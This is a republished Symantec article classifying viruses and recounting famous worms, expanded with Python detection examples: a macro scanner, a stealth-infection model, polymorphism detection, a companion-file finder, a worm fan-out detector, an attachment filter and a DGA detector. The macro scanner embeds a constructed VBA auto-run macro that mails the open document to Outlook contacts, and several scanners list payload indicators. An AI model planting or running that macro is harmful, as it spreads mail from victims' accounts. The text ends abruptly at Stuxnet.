Security 1:1 - Part 1 - Viruses and Worms

https://www.symantec.com/connect/articles/security-11-part-
1-viruses-and-worms

Welcome to the Security 1:1 series of articles


In Part 1 we start right off with viruses and worms: the definitions and what differentiates them. Nowadays both terms are often used interchangeably, but there are still differences between them. We then look at the classifications and the characteristics of each type, and take a brief historical look at the best-known and most devastating viruses and worms of the past.
I will also provide references to the Symantec write-ups for those threats, where both in-depth characteristics and removal procedures can be checked. Throughout the series I also invite you to watch the YouTube videos from the Norton and Symantec channels introducing various types of threats and attacks; they are presented in a really informative (sometimes also funny) way and are very easy to understand.
The Security 1:1 series consists so far of the following articles:
 Security 1:1 - Part 1 - Viruses and Worms
 Security 1:1 - Part 2 - Trojans and other security threats
 Security 1:1 - Part 3 - Various types of network attacks
1. Viruses
Virus - a malicious program able to inject its code into other programs/applications or data files. After successful replication the targeted files are "infected". By definition a virus installs itself without the user's consent and spreads as executable code carried from one host to another. The purpose of viruses is very often harmful: data deletion or corruption on the targeted host, in the worst case leaving the system inoperable.
Viruses can spread quickly over networks, shares or removable media. Many virus spread scenarios are tied to social engineering, where end users are tricked into clicking malicious links or downloading malicious files; in other cases infection follows from opening a malicious email attachment. As already mentioned, viruses can also inject their code into other legitimate executables, so that when an end user later runs the infected program the virus code contained in it executes alongside it. Viruses can also take advantage of known OS security vulnerabilities to gain access to target hosts.
Video - Symantec Guide to Scary Internet Stuff: Pests on Your PC - Viruses, Trojans &
Worms
Depending on where the virus "resides" we can classify viruses in the following way:
 Resident Virus - a virus that embeds itself in memory on the target host and stays there, so it becomes active every time the OS starts or performs a specific action (for example opening or executing a file), and can infect files as they are touched.
 Non-resident Virus - when executed, this type of virus actively seeks targets for infection on local, removable or network locations. After infecting them it exits; it does not stay resident in memory.
 Boot sector Virus - a virus that specifically targets the boot sector of a floppy or partition, or the master boot record (MBR) of a hard drive. Such a virus is loaded into memory every time an attempt is made to boot from the infected drive, well before the OS loads. Boot sector viruses were quite common in the 90s, when the infection spread mostly through infected floppy disks left in bootable drives.
 Macro Virus - a virus written in a macro language and embedded in Word, Excel, Outlook etc. documents. It executes as soon as the document containing it is opened, because the document's auto-run macros (for example AutoOpen or Document_Open in Word) fire automatically when macro execution is enabled; older Office versions ran them with at most a warning prompt. Current Office versions disable macros from untrusted sources by default, so the user has to enable them explicitly, which is why macro malware now relies on social engineering to obtain that click.

A well-known example of a macro virus is Melissa (http://virus.wikia.com/wiki/Melissa) [1999], very widespread at the time. The worldwide damage caused by it was estimated at over 1.1 billion dollars. The creator of the virus, David L. Smith, was sentenced in 2002 to 20 months in federal prison; the maximum sentence could have been much higher, but Smith agreed to cooperate with federal authorities in finding other virus and malware authors.
Reference:
http://www.symantec.com/security_response/writeup.jsp?docid=2000-122113-1425-99
W97M.Melissa.A (also known as W97M.Mailissa) is a macro virus with a payload that emails itself using MS Outlook. The subject of the e-mail is "Important Message From USERNAME". Melissa is a typical macro virus with an unusual payload: when a user opens an infected document, the virus attempts to e-mail a copy of that document to up to 50 other people using Microsoft Outlook.
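The combination described in the write-up, an auto-run trigger plus code that drives the mail client, is exactly what a static macro scanner looks for. The following Python is an added example, not code from the article or from Symantec: it scans VBA source text for auto-execute procedure names and for the API calls a mass mailer needs. Both macro sources are constructed for the example; the first imitates the behaviour described above and is not Melissa's code, and the indicator list is an assumption to be extended for real use.

```python
import re

# Procedure names Word/Excel run automatically (fact about Office, not from the article).
AUTOEXEC_NAMES = {"AutoOpen", "AutoExec", "AutoNew", "AutoClose", "Auto_Open",
                  "Document_Open", "Document_Close", "Workbook_Open"}

# Substrings that, together with an auto-exec trigger, indicate a mass-mailing payload.
INDICATORS = {
    "CreateObject": "late-bound COM object creation",
    "Outlook.Application": "drives the mail client",
    "AddressLists": "harvests address books",
    "Recipients.Add": "builds a recipient list",
    "Attachments.Add": "attaches a file (usually the document itself)",
    ".Send": "sends mail without user interaction",
    "Shell": "launches an external program",
    "WScript": "scripting host / registry access",
}

# Constructed sample imitating the behaviour in the Melissa write-up (not Melissa's code).
MAILER_MACRO = r"""
Private Sub Document_Open()
    On Error Resume Next
    Set app = CreateObject("Outlook.Application")
    Set ns = app.GetNameSpace("MAPI")
    For Each lst In ns.AddressLists
        Set msg = app.CreateItem(0)
        For i = 1 To 50
            msg.Recipients.Add lst.AddressEntries(i)
        Next i
        msg.Subject = "Important Message From " & Application.UserName
        msg.Attachments.Add ActiveDocument.FullName
        msg.Send
    Next lst
End Sub
"""

# Constructed benign macro for comparison.
BENIGN_MACRO = r"""
Sub FormatReport()
    Selection.Font.Bold = True
    ActiveDocument.Save
End Sub
"""

PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.MULTILINE)


def find_procedures(vba_source: str) -> list:
    """Names of all Sub/Function procedures defined in the source."""
    return PROC_RE.findall(vba_source)


def analyse_macro(vba_source: str) -> dict:
    """Static triage of one VBA module: auto-exec triggers plus payload indicators."""
    procedures = find_procedures(vba_source)
    autoexec = [p for p in procedures if p in AUTOEXEC_NAMES]
    hits = {k: v for k, v in INDICATORS.items() if k in vba_source}
    # A mass mailer needs a trigger, the mail client and a send call.
    mass_mailer = bool(autoexec) and {"Outlook.Application", ".Send"} <= set(hits)
    return {
        "procedures": procedures,
        "autoexec": autoexec,
        "indicators": sorted(hits),
        "mass_mailer": mass_mailer,
    }


if __name__ == "__main__":
    for name, src in (("mailer", MAILER_MACRO), ("benign", BENIGN_MACRO)):
        print(name, analyse_macro(src))
```

In practice the VBA source is pulled out of the OLE container first (the oletools `olevba` utility does that), and this kind of triage is the first pass before the macro is run in a sandbox.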
Another classification of viruses follows from their characteristics:
 File-infecting Virus (File-Infector) - the classic form of virus. When the infected file is executed, the virus seeks out other files on the host and infects them with its code. The malicious code is inserted either at the beginning of the host file (prepending virus), in the middle (mid-infector), or at the end (appending virus). A specific type called a "cavity virus" can even inject its code into gaps in the file structure itself. The file's entry point is changed to the start of the virus code to ensure that it runs when the file is executed; afterwards control may or may not be passed on to the original program. Depending on the infection routine the host file may be left corrupted and completely non-functional. More sophisticated viral forms let the host program run normally while trying to hide their own presence completely (see polymorphic and metamorphic viruses). For an appending infector, an entry point that lies outside the code section, or in the last section of the file, is the classic heuristic a scanner uses to spot the change.
 Polymorphic Virus - this kind of virus changes its appearance every time it replicates and infects a new file, in order to stay undetected by antivirus programs. The virus body is stored encrypted with a different key on each copy, and the small decryptor routine placed in front of it is itself varied (different registers, instruction ordering, junk instructions), so no fixed byte sequence survives from one copy to the next. Detection by plain signature matching is therefore very difficult, since the number of variants can run into hundreds or even thousands; scanners counter this by matching the decryptor's shape with wildcards, or by emulating it until the body is decrypted and then scanning the result.
 Metamorphic Virus - a virus that rewrites its own code with each infection. The rewriting (instruction substitution, register reassignment, reordering of blocks, insertion of dead code) makes every copy look different, but the functionality stays the same; unlike a polymorphic virus there is no constant decryptor and no encrypted body to recover. Some metamorphic engines have been written to emit code for more than one operating system or even different processor architectures, but that is a property of the particular engine rather than of metamorphism itself. Metamorphic viruses are among the most complex to build and very difficult to detect.
 Stealth Virus - a memory-resident virus that uses various mechanisms to avoid detection. Typically it hooks the operating system's file or disk services and, whenever another program (an antivirus scanner included) reads an infected file or sector, returns the original clean content while the infected version stays on disk. It can also temporarily disinfect a file while it is being read and re-infect it afterwards, and it actively conceals traces of its activity such as changes in file size or timestamps. The practical countermeasure is to scan from a clean boot medium so that the virus is not resident, or to compare what the running system reports with what a raw read of the disk returns.

The first known full-stealth virus was "Brain" (http://virus.wikia.com/wiki/Brain), a boot infector. The virus monitors physical disk I/O and redirects any attempt to read a Brain-infected boot sector to where the original disk sector is stored.
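What Brain's redirect looks like in practice, and the cross-view check that defeats it, as an added example that is not code from the article and models none of Brain's actual code: a toy disk in Python where the resident virus hooks the read service, plus a comparison of hooked reads against raw reads. The sector layout, sector size and the byte strings are constructed for the example.

```python
# Constructed model of a stealth boot-sector infector; none of this is Brain's code.
SECTOR_SIZE = 512
BOOT_SECTOR = 0


def _sector(text: bytes) -> bytes:
    """Pad a marker string to a full sector."""
    return text.ljust(SECTOR_SIZE, b"\0")


class Disk:
    """Raw sectors. read_raw is what a scan from clean boot media (no virus resident) sees."""

    def __init__(self, n_sectors: int = 16):
        self.sectors = [bytes(SECTOR_SIZE) for _ in range(n_sectors)]
        self.sectors[BOOT_SECTOR] = _sector(b"ORIGINAL_BOOT_CODE")

    def read_raw(self, n: int) -> bytes:
        return self.sectors[n]

    def write_raw(self, n: int, data: bytes) -> None:
        assert len(data) == SECTOR_SIZE
        self.sectors[n] = data


class StealthInfector:
    """Saves the original boot sector elsewhere, overwrites sector 0 with its own code,
    and hooks the disk read service so that reads of sector 0 return the saved original."""

    def __init__(self, disk: Disk, hide_at: int = 7):
        self.disk, self.hide_at = disk, hide_at

    def infect(self) -> None:
        self.disk.write_raw(self.hide_at, self.disk.read_raw(BOOT_SECTOR))
        self.disk.write_raw(BOOT_SECTOR, _sector(b"VIRUS_BOOT_CODE"))

    def hooked_read(self, n: int) -> bytes:
        """Stands in for the resident INT 13h handler the virus installs."""
        if n == BOOT_SECTOR:
            return self.disk.read_raw(self.hide_at)
        return self.disk.read_raw(n)


def cross_view_check(os_read, raw_read, n_sectors: int) -> list:
    """Sectors whose content as reported through the OS differs from the raw disk."""
    return [n for n in range(n_sectors) if os_read(n) != raw_read(n)]


def demo():
    """Infect the toy disk and compare the three ways of looking at sector 0."""
    disk = Disk()
    virus = StealthInfector(disk)
    virus.infect()
    seen_via_hook = b"VIRUS" in virus.hooked_read(BOOT_SECTOR)  # scanner on the live system
    seen_raw = b"VIRUS" in disk.read_raw(BOOT_SECTOR)           # scanner from clean boot media
    diff = cross_view_check(virus.hooked_read, disk.read_raw, len(disk.sectors))
    return seen_via_hook, seen_raw, diff


if __name__ == "__main__":
    print(demo())
```

The same cross-view idea (compare the API's answer with an independent, lower-level read) is what modern rootkit detectors do for files, registry keys and processes.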
 Armored Virus - a complex type of virus designed to make its examination much more difficult than that of traditional viruses, using anti-debugging and anti-disassembly tricks and obfuscated code. Using various methods an armored virus can also protect itself from antivirus software by fooling it into believing that the virus is located somewhere other than its real location, which of course makes detection and removal harder.
 Multipartite Virus - a virus that attacks both executable files and the master boot record of the drive at the same time. This type can be tricky to remove: even when the executables have been cleaned it can re-infect the system from the boot sector if that was not cleaned as well, and vice versa.
 Camouflage Virus - a virus type able to pass itself off as a harmless program to antivirus software. Where the virus code resembles the code of legitimate, non-infected files, the antivirus application is tricked into believing it is dealing with the legitimate program; this only works against basic signature-based antivirus software. As antivirus solutions have become more elaborate, camouflage viruses are quite rare and not a serious threat, given the ease of their detection.
 Companion Virus - unlike traditional viruses the companion virus does not modify any files but instead abuses the way DOS (and cmd.exe, through PATHEXT) resolves a command typed without an extension: a .com file is tried before a .exe of the same name, which in turn is tried before a .bat. So when the user types "program" and expects program.exe to run, a planted program.com runs instead, typically launching the real program.exe afterwards so that nothing looks wrong. The companion virus is an older type and became increasingly rare after the introduction of Windows XP. Nowadays this kind of virus can still be run unintentionally if the host machine does not have the "show file extensions" option enabled and the user accidentally clicks the companion virus file.
 Cavity Virus - unlike traditional viruses the cavity virus does not attach itself to the end of the infected file but instead uses the empty spaces within the program file itself (which exist there for a variety of reasons, such as alignment padding between sections). This way the length of the program is not changed and the virus can more easily avoid detection. In most cases the injection does not affect the functionality of the host file at all. Cavity viruses are quite rare though.

One good example of a cavity virus is "Lehigh" (http://virus.wikia.com/wiki/Lehigh), an early DOS cavity infector that specifically targeted command.com files, using unused portions of the file's code.
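To make the polymorphic and metamorphic discussion above concrete, here is an added example (not from the article) in Python: a toy polymorphic replicant whose body is XOR-encrypted with a fresh key per copy and whose decryptor stub varies, run against three detection strategies over fifty generations: a fixed byte signature (which fails), a wildcard match on the decryptor's shape, and emulation of the decryptor followed by a scan of the decrypted body. The "opcodes", the viral body and the signature are constructed stand-ins, not real machine code or a real signature.

```python
import random

# Constructed stand-in for the viral body; a real infector carries machine code here.
BODY = b"VIRAL_PAYLOAD: locate host, append self, patch entry point"

# Byte string a naive signature scanner would search for (an assumed signature).
STATIC_SIGNATURE = b"VIRAL_PAYLOAD"

# Toy "instruction set" for the decryptor stub (not real x86).
NOP = 0x90
MOV_OPCODES = (0xB0, 0xB1, 0xB3)   # load the key into one of three registers
LOOP_MARKER = 0xEB                 # "jump into the XOR loop"


def make_generation(rng: random.Random) -> bytes:
    """One replicant: [0-3 NOPs][MOV reg, key][LOOP][BODY XOR key].

    A fresh key is drawn on every replication, so the encrypted body never
    repeats, and the stub varies in padding length and register choice.
    """
    key = rng.randrange(1, 256)           # key 0 would leave the body in the clear
    stub = bytes([NOP] * rng.randrange(0, 4))
    stub += bytes([rng.choice(MOV_OPCODES), key, LOOP_MARKER])
    return stub + bytes(b ^ key for b in BODY)


def parse_stub(sample: bytes):
    """(key, body_offset) if the sample starts with a recognisable decryptor, else None."""
    i = 0
    while i < len(sample) and sample[i] == NOP:
        i += 1
    if i + 3 > len(sample) or sample[i] not in MOV_OPCODES or sample[i + 2] != LOOP_MARKER:
        return None
    return sample[i + 1], i + 3


def static_scan(sample: bytes) -> bool:
    """Fixed byte-signature match: defeated by the per-copy encryption."""
    return STATIC_SIGNATURE in sample


def wildcard_scan(sample: bytes) -> bool:
    """Match the shape of the decryptor with wildcards for padding, register and key."""
    return parse_stub(sample) is not None


def emulate_and_scan(sample: bytes) -> bool:
    """Run the decryptor (here an XOR loop), then scan the decrypted body."""
    parsed = parse_stub(sample)
    if parsed is None:
        return False
    key, offset = parsed
    return STATIC_SIGNATURE in bytes(b ^ key for b in sample[offset:])


def evaluate(n: int = 50, seed: int = 7) -> dict:
    """Generate n replicants and count how many each strategy catches."""
    rng = random.Random(seed)
    gens = [make_generation(rng) for _ in range(n)]
    return {
        "distinct_samples": len(set(gens)),
        "static_hits": sum(static_scan(g) for g in gens),
        "wildcard_hits": sum(wildcard_scan(g) for g in gens),
        "emulation_hits": sum(emulate_and_scan(g) for g in gens),
    }


if __name__ == "__main__":
    print(evaluate())
```

The wildcard match is cheap but brittle (a metamorphic rewrite of the stub breaks it); emulation is what real engines fall back to, and it is also why a metamorphic virus with no decryptor at all is so much harder, since there is nothing constant to emulate towards.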
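The companion-virus trick above rests on a resolution order, and the check for it is a directory scan for shadowing pairs. The following Python is an added example, not code from the article: it reproduces the DOS-style resolution order and lists every .com that shadows a same-named .exe, with the size and age hints a responder would use to tell an infection from a vendor-shipped pair. The directory contents are constructed in a temporary folder.

```python
import tempfile
from pathlib import Path

# Resolution order COMMAND.COM uses for a bare command name; cmd.exe generalises
# it through PATHEXT, whose default also starts .COM;.EXE;.BAT.
SEARCH_ORDER = (".com", ".exe", ".bat")


def resolve_command(directory, name: str):
    """Path that DOS-style resolution would execute when the user types `name`."""
    for ext in SEARCH_ORDER:
        candidate = Path(directory) / (name + ext)
        if candidate.is_file():
            return candidate
    return None


def find_companions(directory) -> list:
    """Report every .com that shadows a same-named .exe in the directory.

    A shadowing .com that is tiny and newer than its .exe is the classic
    companion-infection pattern; vendor-shipped pairs are usually comparable
    in size and date.
    """
    findings = []
    for exe in sorted(Path(directory).glob("*.exe")):
        com = exe.with_suffix(".com")
        if com.is_file():
            findings.append({
                "shadowed": exe.name,
                "shadow": com.name,
                "shadow_size": com.stat().st_size,
                "shadow_newer": com.stat().st_mtime >= exe.stat().st_mtime,
            })
    return findings


def demo():
    """Constructed scenario: legitimate program.exe and other.exe, plus a planted program.com."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "program.exe").write_bytes(b"MZ" + bytes(4096))   # stand-in for a real PE
        (d / "other.exe").write_bytes(b"MZ" + bytes(4096))
        (d / "program.com").write_bytes(b"\xEB\xFE")             # stand-in for the companion
        return resolve_command(d, "program").name, find_companions(d)


if __name__ == "__main__":
    chosen, findings = demo()
    print("typing 'program' runs:", chosen)
    for f in findings:
        print(f)
```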
2. Worms
Worm - a category of malicious program that spreads itself, typically by exploiting operating system or service vulnerabilities, abusing email, or copying itself over network shares. In its design a worm is quite similar to a virus, and is sometimes even considered a sub-class of it. Unlike a virus, though, a worm reproduces and spreads by itself and does not need to attach itself to any existing program or executable. In other words it needs no user interaction to reproduce; this is what makes worms especially dangerous, as they can travel across networks with a devastating effect on both hosts and servers while consuming network bandwidth. More invasive worms tunnel into the host system and from within allow code execution or remote control by the attacker. Some worms also include a viral component that infects executable files.
The most common categorization of worms relies on the method by which they spread:
 email worms: spread through email messages, especially those with attachments
 internet worms: spread directly over the internet by exploiting open ports or system vulnerabilities
 network worms: spread over open, unprotected network shares
 multivector worms: having two or more different spreading capabilities
Some of the best-known and most destructive worms (by date):
 Iloveyou [2000] (http://virus.wikia.com/wiki/Loveletter) - also known as Loveletter
A worm created by a computer student in the Philippines. It arrived in email inboxes with the simple subject "ILOVEYOU" and an attachment "LOVE-LETTER-FOR-YOU.TXT.vbs". The final ".vbs" extension was hidden by Windows' default "hide extensions for known file types" setting, leading unsuspecting users to think it was a text file. Upon opening the attachment, the worm sent a copy of itself to everyone in the Windows Address Book using the user's own sender address. It also made a number of malicious changes to the user's system. Symantec Security Response has identified 82 variants of this worm.
More than 45 million computers around the globe were reportedly infected by various strains of the worm. The Ford Motor Company shut off its email system after being hit by the worm. Others affected were Silicon Graphics, the Department of Defense (including the Pentagon), Daimler-Chrysler and the Motion Picture Association of America. Estimates of the worm's damage: over $10 billion.
Reference:
[VBS.LoveLetter.Var]
http://www.symantec.com/security_response/writeup.jsp?docid=2000-121815-2258-99
 CodeRed and CodeRed II [2001] (http://virus.wikia.com/wiki/CodeRed)
A worm that targeted servers running the Microsoft IIS (Internet Information Server) web server. The worm propagates by picking random IP addresses and exploiting a known buffer overflow in the Index Server ISAPI extension, idq.dll, on any IIS host it finds there. It contains the text string "Hacked by Chinese!", which it displayed on web pages of the infected servers. The original CodeRed had a payload that launched a Denial of Service (DoS) attack on the White House web server. CodeRed II has a different payload: it installs a backdoor that gives its creator full remote access to the web server.
The reported cost of worm activities: $2 billion
Reference:
[CodeRed II]
http://www.symantec.com/security_response/writeup.jsp?docid=2001-080421-3353-99
 Sobig [2003] (http://virus.wikia.com/wiki/Sobig)
One of the most destructive worms ever. The worm sends itself to all the addresses it finds in .txt, .eml, .html, .htm, .dbx and .wab files. It was able to send over a million copies of itself within just a few hours of the outbreak. Sobig was the first of the spam botnet worms: while some worms, like Tanatos, dropped trojans on the computers they infected, Sobig was the first to turn infected computers into spam relays. The worm stalled or completely crashed Internet gateways and email servers worldwide.
Total estimated damage cost of the worm: $37 billion.
Reference:
[W32.Sobig.A@mm]
http://www.symantec.com/security_response/writeup.jsp?docid=2003-010913-1627-99
 Blaster [2003] (http://virus.wikia.com/wiki/Blaster) - also known as Lovesan
Blaster is a worm that propagates by exploiting the Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (BID 8205, patched in MS03-026), affecting both Windows 2000 and Windows XP machines. Once a computer was infected it displayed a message box indicating that the system would shut down in a couple of minutes. It also has a date-triggered payload that launches a DDoS attack against windowsupdate.com.
The Blaster worm shut down CSX, the largest railroad system in the eastern U.S., for hours, crippled the new Navy/Marine Corps intranet and shut down Air Canada's check-in system.
Overall estimated damage caused by the worm: $320 million.
Reference:
[W32.Blaster.Worm]
http://www.symantec.com/security_response/writeup.jsp?docid=2003-081113-0229-
99&tabid=2
 Sasser [2004] (http://virus.wikia.com/wiki/Sasser)
Sasser is a worm that exploits the vulnerability described in Microsoft Security Bulletin MS04-011. The worm was written by a German computer science student. It spreads by scanning randomly selected IP addresses for vulnerable systems; when one is found, the worm sends shellcode to the target that exploits the LSASS buffer overflow vulnerability. Sasser used a different vulnerability from Blaster's DCOM RPC flaw, but one of the same kind: an unauthenticated remote overflow in a core Windows service exposed on the network, again affecting Windows 2000 and XP. Sasser also displayed a notice indicating that the system was shutting down.
Security experts estimate that infected computers numbered in the millions. British Airways suffered delays when the worm hit Terminal Four at London's Heathrow Airport. Other affected organisations were Sampo Bank in Finland, Deutsche Post, Delta Air Lines, the British Coastguard, the French Stock Exchange and the Agence France-Presse news agency. Damage costs caused by the worm are estimated at $500 million.
Reference:
[W32.Sasser.Worm]
http://www.symantec.com/security_response/writeup.jsp?docid=2004-050116-1831-99
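Blaster and Sasser share one network-visible behaviour: a single host contacting a large number of distinct addresses on one service port within seconds. The following Python is an added example, not code from the article: a sliding-window fan-out detector run over constructed flow records, one benign client and one host sweeping forty addresses on TCP/135. The records, the window and the threshold are assumptions for the example; in a real deployment they come from NetFlow or firewall logs and are tuned per network.

```python
from collections import defaultdict


def build_sample_flows():
    """Constructed flow records (t_seconds, src, dst, dst_port); not real traffic."""
    flows = []
    # A benign client talking to three servers on assorted ports over a minute.
    for t, dst, port in [(0, "10.0.1.7", 445), (4, "10.0.1.7", 445),
                         (9, "10.0.1.8", 80), (15, "10.0.1.9", 443), (40, "10.0.1.8", 80)]:
        flows.append((float(t), "10.0.0.5", dst, port))
    # A worm-style sweep: one host probes 40 distinct addresses on one port in 12 s.
    for i in range(40):
        flows.append((i * 0.3, "10.0.0.9", f"172.16.{i // 256}.{i % 256}", 135))
    return sorted(flows)


def detect_fanout(flows, window=10.0, threshold=20):
    """Alert when one source contacts >= threshold distinct hosts on the same
    destination port within `window` seconds (sliding window per (src, port))."""
    by_key = defaultdict(list)
    for t, src, dst, port in flows:
        by_key[(src, port)].append((t, dst))

    alerts = []
    for (src, port), events in by_key.items():
        events.sort()
        in_window = defaultdict(int)   # dst -> number of events inside the window
        left = 0
        for t, dst in events:
            in_window[dst] += 1
            while t - events[left][0] > window:      # drop events that fell out of the window
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= threshold:
                alerts.append({"src": src, "port": port,
                               "distinct_dst": len(in_window), "at": t})
                break                                # one alert per (src, port)
    return alerts


if __name__ == "__main__":
    for alert in detect_fanout(build_sample_flows()):
        print(alert)
```

Legitimate scanners (vulnerability management, monitoring) trip the same rule, so the practical deployment keeps an allow-list of known scanning hosts and raises the threshold for them rather than disabling the check.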
 MyDoom [2004] (http://virus.wikia.com/wiki/Mydoom) - also known as Novarg
One of the most damaging email worms ever released. The worm also spread through the Kazaa file-sharing system. It arrived as an attachment with the file extension .bat, .cmd, .exe, .pif, .scr or .zip. When a computer is infected, the worm sets up a backdoor by opening TCP ports 3127 through 3198, which can allow an attacker to connect to the computer and use it as a proxy to gain access to its network resources.
The impact of the worm was felt worldwide, as it slowed down internet traffic. Estimated reported costs of the worm: $38 billion.
Reference:
[W32.Mydoom.A@mm]
http://www.symantec.com/security_response/writeup.jsp?docid=2004-012612-5422-99
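Both ILOVEYOU (an executable hidden behind a decoy ".TXT") and MyDoom (a fixed list of executable and archive attachment types) are caught by the same gateway check on attachment names. The following Python is an added example, not code from the article: it parses a message with the standard library and classifies each attachment, blocking executables, flagging the double-extension trick explicitly, and sending archives for inspection. The message and its attachments are constructed for the example, and the extension lists are assumptions to be extended for real use.

```python
import email
from email import policy
from email.message import EmailMessage
from pathlib import PurePosixPath

# Extensions Windows runs on double-click: the MyDoom list plus the script types
# ILOVEYOU relied on. An assumption for this example; extend for real use.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr",
                   ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta"}
ARCHIVE_EXTS = {".zip", ".rar", ".7z"}
DECOY_EXTS = {".txt", ".doc", ".pdf", ".jpg", ".png", ".xls"}


def classify_attachment(filename: str):
    """Return (verdict, reason) for one attachment name."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes:
        return ("inspect", "no extension")
    last = suffixes[-1]
    if last in EXECUTABLE_EXTS:
        if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS:
            return ("block", f"executable {last} hidden behind decoy extension {suffixes[-2]}")
        return ("block", f"executable attachment {last}")
    if last in ARCHIVE_EXTS:
        return ("inspect", "archive: extract and re-scan the contents")
    return ("allow", "")


def scan_message(raw: bytes):
    """Parse a raw RFC 5322 message and classify every attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        results.append((name, classify_attachment(name)))
    return results


def build_sample_message() -> bytes:
    """Constructed message with three attachments: the first mimics the ILOVEYOU
    naming trick, the last the archive form MyDoom used."""
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "ILOVEYOU"
    msg.set_content("kindly check the attached LOVELETTER coming from me.")
    for name in ("LOVE-LETTER-FOR-YOU.TXT.vbs", "report.pdf", "document.zip"):
        msg.add_attachment(b"placeholder bytes", maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_bytes()


if __name__ == "__main__":
    for name, (verdict, reason) in scan_message(build_sample_message()):
        print(f"{verdict:8} {name:32} {reason}")
```

Name-based filtering is only the first layer: the content type should be checked against the file's actual magic bytes as well, since a renamed executable inside a .zip passes this check until the archive is opened and re-scanned.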
 Conficker [2008] (http://virus.wikia.com/wiki/Conficker) - also known as Downadup
Downadup spreads primarily by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability MS08-067 (BID 31874), which was first disclosed in late October 2008. It scans the network for vulnerable hosts, but instead of flooding it with traffic it selectively queries various computers in an attempt to mask its activity. It also takes advantage of Universal Plug and Play to pass through routers and gateways, attempts to spread to network shares by brute-forcing commonly used passwords, and copies itself to removable drives.
It has the ability to update itself or receive additional files for execution. It does this by generating a large number of new domain names to contact every day, so that blocking any single domain is useless; most of those names are never registered, which is why the resulting bursts of failed DNS lookups are a useful detection signal. The worm may also receive and execute files through a peer-to-peer mechanism by communicating with other compromised computers, which are seeded into the botnet by the malware author. The worm blocks access to predetermined security-related websites so that it appears the network request timed out. Furthermore, it deletes registry entries to disable certain security-related software, prevent access to Safe Mode and disable Windows Security Alert notifications.
It has an extremely large infection base, estimated at between 10 and 15 million computers. This is largely attributed to the fact that it is capable of exploiting computers running unpatched Windows XP SP2 and Windows 2003 SP1. It is worth noting that the vulnerability that allowed Conficker to spread had been patched a little over a month before the worm appeared. Still, millions of computers were not updated.
Estimated damage cost of the worm: $9 billion.
Reference:
[W32.Downadup]
http://www.symantec.com/security_response/writeup.jsp?docid=2008-112203-2408-99
Simple steps to protect yourself from the Conficker Worm
http://www.symantec.com/business/support/index?page=content&id=TECH93179
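The domain-generation behaviour described above leaves a trace in resolver logs: one client producing many NXDOMAIN answers for many distinct, random-looking registrable domains. The following Python is an added example, not code from the article, and does not reproduce Conficker's actual domain algorithm: it parses constructed resolver log lines and flags clients whose lookups are mostly failures across many distinct domains, reporting the mean entropy of the labels as a secondary hint. The log format, the sample lines and the thresholds are assumptions for the example.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed resolver log ("<unix_ts> <client> <qname> <rcode>"); not real Conficker traffic.
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com NOERROR
1700000003 10.0.0.5 mail.example.com NOERROR
1700000010 10.0.0.5 update.example.org NOERROR
1700000012 10.0.0.5 wwww.example.com NXDOMAIN
1700000020 10.0.0.5 cdn.example.net NOERROR
1700000001 10.0.0.9 qzkvmxjh.net NXDOMAIN
1700000002 10.0.0.9 xpbwtrqe.org NXDOMAIN
1700000002 10.0.0.9 lkjqwzev.info NXDOMAIN
1700000003 10.0.0.9 mzxcvbqp.biz NXDOMAIN
1700000004 10.0.0.9 ptyuoqwk.cc NXDOMAIN
1700000004 10.0.0.9 vbnmkiuh.ws NXDOMAIN
1700000005 10.0.0.9 hjklqwet.net NXDOMAIN
1700000006 10.0.0.9 zxcvbnwq.org NXDOMAIN
1700000006 10.0.0.9 tyuqwerl.info NXDOMAIN
1700000007 10.0.0.9 ghjkzxcm.biz NXDOMAIN
1700000008 10.0.0.9 rtyuiopx.cc NXDOMAIN
1700000009 10.0.0.9 asdfqwek.ws NOERROR
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(NOERROR|NXDOMAIN|SERVFAIL)$")


def parse_log(text):
    """Yield (ts, client, qname, rcode) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m.group(1)), m.group(2), m.group(3).lower(), m.group(4)


def registered_domain(qname: str) -> str:
    """Naive registrable domain (last two labels); ignores public suffixes like co.uk."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def dga_suspects(log_text: str, min_distinct: int = 10, min_ratio: float = 0.5) -> list:
    """Clients whose lookups are mostly NXDOMAIN across many distinct registrable domains."""
    totals = Counter()
    nx_count = Counter()
    nx_domains = defaultdict(set)
    for _ts, client, qname, rcode in parse_log(log_text):
        totals[client] += 1
        if rcode == "NXDOMAIN":
            nx_count[client] += 1
            nx_domains[client].add(registered_domain(qname))

    suspects = []
    for client, domains in nx_domains.items():
        ratio = nx_count[client] / totals[client]
        if len(domains) >= min_distinct and ratio >= min_ratio:
            labels = [d.split(".")[0] for d in domains]
            suspects.append({
                "client": client,
                "distinct_nxdomain": len(domains),
                "nxdomain_ratio": round(ratio, 2),
                "mean_label_entropy": round(sum(map(shannon_entropy, labels)) / len(labels), 2),
            })
    return suspects


if __name__ == "__main__":
    for s in dga_suspects(SAMPLE_LOG):
        print(s)
```

Pure NXDOMAIN counting also catches typo-squatting research and misconfigured software, so the usual follow-up is to look at the names themselves (length, character distribution, TLD spread) and at whether the few successful lookups are followed by outbound connections to freshly registered domains.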
 Stuxnet [2010]
